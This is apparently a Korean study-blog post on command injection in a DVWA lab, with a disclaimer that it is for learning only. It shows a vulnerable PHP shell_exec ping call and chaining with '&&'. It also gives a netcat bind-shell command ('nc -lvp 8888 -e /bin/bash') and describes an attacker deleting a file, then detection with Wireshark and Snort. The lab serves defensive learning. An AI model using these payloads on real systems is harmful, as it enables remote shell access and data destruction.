Command injection

블로그의 모든 내용은 학습 목적으로만 사용하세요.

불법적인 행위에 대한 모든 책임은 당사자에 있습니다.

---

command - 명령어

injection - 주입 / 삽입

--> 명령어가 전달될 때 해커가 원하는 명령어를 삽입하는 공격

 

 

통신 확인 가능

우측 아래로 내리면 View Source가 있다.

 

 

 

실제 실행되는 명령어

$cmd = shell_exec(' ping -c 4 '.$target);

                                                   -------- : input창에 입력한 IP 주소이다.

---

ping -c 4 4.4.4.50 이라고 하는 명령어가 실행된다.

--> 실행 후 결과값을 반환한다.

--> 터미널에서 ping을 친 결과와 페이지에서 입력한 4.4.4.50과 동일한 결과값이 나온다.

 

ex)

리눅스 업데이트 명령어

yum -y update

yum -y upgrade

일일이 치기 귀찮을 때

yum -y update && yum -y upgrade

------------------1번  ---------------------2번째 실행

 

조건 : 1번이 정상적으로 동작 시 2번이 실행된다.

 

ping -c 4 8.8.8.8 && ls를 하면, ping을 보낸 후 ls 명령을 실행한다.

DVWA에도 동일한 결과가 나옴

---

dvwa서버 - 피해 서버

nc -lvp 8888 -e /bin/bash      --> Netcat Server 설정 명령

공격자                                   --> 공격자 컴퓨터는 명령 전달 서버를 사용해 공격함 = C&C 서버

 

dc dvwa.geum.com 8888     --> Netcat Client 설정

---

<실습>

목표

공격 - command injection

후속공격 - netcat

두개 다 로그 분석해서 snort rules에 등록

 

 

해커는 dns서버 호스트에 Command Injection으로 8888번 포트를 Listen 모드로 바꾼다.

 

해커는 Netcat으로 dns서버 관리자의 host pc 8888번 포트에 접속한다.

ls 결과 중요한 파일(Warnning!)이 보이길래 rm 명령어로 파일을 삭제해버렸다.

이후 ls 결과 Warnning 파일이 삭제됨을 확인

 

Wireshark에서 공격자가 원격으로 진행한 명령어들이 tcp.port 8888로 확인했다. [PSH] 플래그

 

 

서버 관리자는 snort를 통해 해킹 공격을 탐지하기 위해 snort rules을 적용

 

 

 

 

 

Netcat과 Command Injection 공격이 들어온 것을 snort로 탐지했다.